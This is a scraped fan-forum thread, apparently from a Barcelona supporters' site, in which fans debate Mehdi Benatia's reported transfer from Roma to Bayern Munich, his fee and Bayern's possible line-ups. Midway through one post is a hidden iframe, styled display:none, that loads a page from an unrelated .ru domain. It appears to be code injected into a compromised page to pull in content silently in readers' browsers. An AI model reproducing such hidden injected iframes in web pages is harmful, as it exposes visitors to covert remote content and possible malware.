Mehdi Benatia

Luftstalag14

Culé de Celestial Empire
Cry me a river.

It is what happens on the pitch that matters. The battle hasn't be lost yet. We will fight Bayern on the pitch, man to man.

Bv-NXzLIEAAch8P.jpg:large

Hamzah

High Definition Member
It might have been timing, as well. At first roma were asking for a higher price, hoping someone would pay it. But no one did. And Bayern is bidding for him now only because Javi got seriously injured.
Same happened with Cuadrado... fiorentina got greedy, and will end up not selling him.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Yeah I agree with this. Now that we have our centre backs it's dumb to go and buy Benatia. Maybe before the price was too high and we got the cheaper options instead.

Bertus

That said guys, the dude had a very rough time in his career when no one believed in him. When he got trashed in France and ended up in a crappy french club.

Was very happy about how it turned out for him in Italia, and even if Bayern is not my cup of tea, that would be an incredible achievement because it was never easy for him.

A bit of luck and lots of work. He deserves to be part of a top club.

Ghostmaster

Danger Ahead
I don't even care, we have the best attacking trio in the world and 5 players that can play as CBs, we have depth, talent and hunger, no need to cry over one player.

Last edited:

Luftstalag14

Culé de Celestial Empire
Well, some people like me saw him play all season last year and keep saying he was one of the world best CBs last year, maybe even the best.

If they really get him for 24+6M, then screw the board. Because all this time we thought it was because he would cost 50-60M, which was not true. Even I got fooled that He would cost much, much more.

Won't say "gratz bayern" yet tho, because HE HAS NOT signed yet.

There is a chance that Roma agreed on the low fee because (1) Bayern is the only club that is seriously pursuing him and (2) they are running out of time to sell him.

Hamzah

High Definition Member
If there's one thing Pep can do is fuck up with too many experiments, let's hope he does it this season.

Luftstalag14

Culé de Celestial Empire
I suppose he will replace Dante?

Alaba --Benatia ---Boateng ---Lahm (4 defenders)

or

Badstuber -- Benatia -- Boateng (3 CBs)

FC B

Sad he didin't come to Barca. Why didn't Zubi came after him now when is priced dropped ? I would have gone for him even if Mathieu and Thomas are already bought. I'm a bit satisfied he ended up in Bayern rather than in rm, Chelshit or other impossible clubs...

Home of Barca Fans